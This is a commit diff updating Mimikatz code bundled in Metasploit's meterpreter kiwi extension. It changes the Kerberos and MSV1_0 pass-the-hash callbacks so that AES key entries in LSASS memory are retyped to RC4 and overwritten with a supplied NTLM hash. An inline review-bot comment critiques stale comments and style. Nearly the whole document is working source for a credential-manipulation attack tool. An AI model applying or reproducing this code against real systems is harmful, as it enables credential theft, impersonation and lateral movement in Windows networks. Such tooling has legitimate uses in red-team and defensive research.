Update to Mimikatz commit 2cb6326ba2658e0d226d7a341fd6bf3bba2dbceb
This commit is contained in:
parent
e7974b4707
commit
fed3ebd43f
c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages
27
c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
27
c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
@ -228,8 +228,10 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
|||||||
DWORD i, nbHash;
|
DWORD i, nbHash;
|
||||||
BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
|
BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
|
||||||
UNICODE_STRING nullPasswd = { 0, 0, NULL };
|
UNICODE_STRING nullPasswd = { 0, 0, NULL };
|
||||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory }, aLocalNTLMMemory = { ntlmHash, Localkerbsession.hMemory }, aLocalPasswdMemory = { &nullPasswd, Localkerbsession.hMemory }, aRemotePasswdMemory = { (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory };
|
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory }, aLocalNTLMMemory = { NULL, Localkerbsession.hMemory }, aLocalPasswdMemory = { &nullPasswd, Localkerbsession.hMemory }, aRemotePasswdMemory = { (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory };
|
||||||
PKERB_HASHPASSWORD_GENERIC pHash;
|
PKERB_HASHPASSWORD_GENERIC pHash;
|
||||||
|
PBYTE baseCheck;
|
||||||
|
SIZE_T offset;
|
||||||
|
|
||||||
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||||
{
|
{
|
||||||
@ -239,7 +241,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
|||||||
{
|
{
|
||||||
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
|
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
|
||||||
{
|
{
|
||||||
RemoteLocalKerbSession.address = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
|
RemoteLocalKerbSession.address = baseCheck = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
|
||||||
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
|
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
|
||||||
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
|
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
|
||||||
{
|
{
|
||||||
@ -249,15 +251,32 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
|||||||
for (i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
|
for (i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
|
||||||
{
|
{
|
||||||
kprintf(L" ");
|
kprintf(L" ");
|
||||||
pHash = (PKERB_HASHPASSWORD_GENERIC)((PBYTE)aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric);
|
offset = i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric;
|
||||||
|
pHash = (PKERB_HASHPASSWORD_GENERIC)((PBYTE)aLocalHashMemory.address + offset);
|
||||||
|
|
||||||
|
if ((pHash->Type == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) || (pHash->Type == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96))
|
||||||
|
{
|
||||||
|
kprintf(L"-");
|
||||||
|
pHash->Type = KERB_ETYPE_RC4_HMAC_NT;
|
||||||
|
pHash->Size = LM_NTLM_HASH_LENGTH;
|
||||||
|
|
||||||
|
aLocalNTLMMemory.address = pHash;
|
||||||
|
RemoteLocalKerbSession.address = baseCheck + offset;
|
||||||
|
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump)))
|
||||||
|
kprintf(L">");
|
||||||
|
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||||
|
}
|
||||||
|
|
||||||
|
aLocalNTLMMemory.address = ntlmHash;
|
||||||
RemoteLocalKerbSession.address = pHash->Checksump;
|
RemoteLocalKerbSession.address = pHash->Checksump;
|
||||||
RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||||
if (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
|
if (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
|
||||||
(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
|
(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
|
||||||
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, pHash->Size ? (min(pHash->Size, LM_NTLM_HASH_LENGTH)) : LM_NTLM_HASH_LENGTH)) // ok not fair-play with AES-* and old CRC =)
|
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, min(pHash->Size, LM_NTLM_HASH_LENGTH))) // ok not fair-play with AES-* and old CRC =)
|
||||||
kprintf(L"%u", i + 1);
|
kprintf(L"%u", i + 1);
|
||||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||||
}
|
}
|
||||||
|
|
||||||
if (pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
|
if (pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
|
||||||
{
|
{
|
||||||
kprintf(L" ");
|
kprintf(L" ");
|
||||||
|
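Review bot: The trailing comment `// ok not fair-play with AES-* and old CRC =)` on the `kull_m_memory_copy(..., min(pHash->Size, LM_NTLM_HASH_LENGTH))` line is now stale, because the new branch above it already rewrites `pHash->Type` and `pHash->Size` for the two AES enctypes before this copy runs; I would replace it with a comment that states the current intent, e.g. `// AES entries were retyped above; other non-RC4 types are still overwritten in place`. The dropped `pHash->Size ? ... : LM_NTLM_HASH_LENGTH` fallback changes what is copied for a zero-length entry, which is not mentioned in the commit message and is worth a sentence there. As a point of style, the new `if (pthData->isReplaceOk = kull_m_memory_copy(...))` in the AES branch, like the existing ones, hides an assignment in a condition; wrapping it as `if ((pthData->isReplaceOk = kull_m_memory_copy(...)))` makes the intent explicit and silences -Wparentheses. The enclosing function kuhl_m_sekurlsa_enum_kerberos_callback_pth begins and ends outside these hunks.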
@ -57,7 +57,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY
|
|||||||
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
|
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
|
||||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||||
|
|
||||||
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
|
kprintf(L"Data copy MSV1_0 @ %p : ", origBufferAddress->address);
|
||||||
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||||
kprintf(L"OK !");
|
kprintf(L"OK !");
|
||||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||||
|